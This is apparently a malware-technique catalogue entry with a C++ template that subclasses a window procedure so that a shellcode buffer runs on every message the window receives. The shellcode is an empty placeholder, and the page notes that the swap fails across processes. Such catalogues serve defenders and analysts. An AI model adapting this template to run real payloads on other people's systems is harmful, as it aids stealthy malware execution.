(C++) Propagate by Unprotect

Created on Thursday 29 December 2022. Updated 1 year, 3 months ago.

Description:

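This code snippet first obtains the handle of the target window using the FindWindow function. It then retrieves the window's current (original) window procedure using the GetWindowLongPtr function and saves it. Next, it replaces that window procedure with the SubclassProc callback using the SetWindowLongPtr function. From then on, every message delivered to the target window reaches the callback first; the callback executes the shellcode buffer and then calls the original window procedure. Note that the listing is a simplified illustration of window-procedure subclassing rather than a working tool: the shellcode array is an empty placeholder, and Microsoft documents that the window-procedure attribute cannot be changed for a window that does not belong to the calling thread's process, so as written the replacement can only take effect for a window owned by the calling process.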

Code

            #include <windows.h>

// Signature used to call the payload buffer: no arguments, no return value.
typedef void (*ShellcodeFunc)(void);

// Payload bytes. The page leaves this initializer empty (placeholder only),
// so the listing is a template rather than a complete program.
unsigned char shellcode[] = {
    // Insert shellcode here
};

// Window procedure the target window had before main() replaced it; written
// once in main() and read by SubclassProc() to forward every message.
WNDPROC originalWndProc;

/*
 * Replacement window procedure installed by main().
 *
 * Invoked for every message delivered to the window, whatever uMsg is: it
 * first calls the shellcode buffer through a ShellcodeFunc cast, then hands
 * the unchanged message to the procedure saved in originalWndProc and returns
 * that procedure's result.
 */
LRESULT CALLBACK SubclassProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
    ShellcodeFunc payload = (ShellcodeFunc)shellcode;
    LRESULT result;

    // Runs on each message, before the original handler sees it
    payload();

    // Forward to the saved procedure so the window's own handling still runs
    result = CallWindowProc(originalWndProc, hwnd, uMsg, wParam, lParam);
    return result;
}

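/*
 * Entry point: looks up a top-level window by its title, saves its current
 * window procedure in originalWndProc, and asks Windows to replace that
 * procedure with SubclassProc.
 *
 * Returns 0 when the replacement was accepted and 1 when any step failed.
 *
 * NOTE(review): Microsoft documents that the window-procedure attribute
 * cannot be changed for a window that does not belong to the calling
 * thread's process, so the final step is expected to fail for a window owned
 * by another process; its result must be checked rather than assumed.
 */
int main()
{
    // Get the handle of the target window (NULL class name: match on title only)
    HWND hwnd = FindWindow(NULL, "Target Window Title");
    if (hwnd == NULL)
        return 1;

    // Save the current window procedure so SubclassProc can forward to it
    originalWndProc = (WNDPROC)GetWindowLongPtr(hwnd, GWLP_WNDPROC);
    if (originalWndProc == NULL)
        return 1;

    // SetWindowLongPtr returns the previous value, and 0 on failure. Because 0
    // can also be a legitimate previous value, clear the last error first and
    // use GetLastError() to tell the two cases apart.
    SetLastError(0);
    if (SetWindowLongPtr(hwnd, GWLP_WNDPROC, (LONG_PTR)SubclassProc) == 0 &&
        GetLastError() != 0)
        return 1;

    return 0;
}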